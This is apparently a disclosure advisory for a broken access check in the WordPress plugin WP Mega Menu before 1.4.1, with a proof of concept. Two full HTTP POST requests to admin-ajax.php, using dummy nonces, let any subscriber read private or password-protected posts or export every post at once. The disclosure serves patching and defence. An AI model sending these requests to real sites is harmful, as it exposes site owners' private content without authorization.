WP Mega Menu < 1.4.1 – Subscriber+ Arbitrary Post Access

Description

The plugin does not properly check for capability and CSRF due to a logic flaw, in its export_theme() and export_wp_megamenu_nav_menu () methods, hooked as AJAX actions and available to any authenticated users. As a result, low privilege authenticated users such as subscribers can call them and access arbitrary post data, including password protected or private ones.

Proof of Concept

Access an Arbitrary Post (post ID is via the theme_id):

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 77
Cookie: [any authenticated user]
Connection: close

action=export_wpmm_theme&theme_id=1055&wpmmm_save_new_theme_nonce_field=dummy


Access All posts at once (result is base64 encoded)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 76
Cookie: [any authenticated user]
Connection: close

action=export_wp_megamenu_nav_menu&menu=1&wpmmm_nav_export_nonce_field=dummy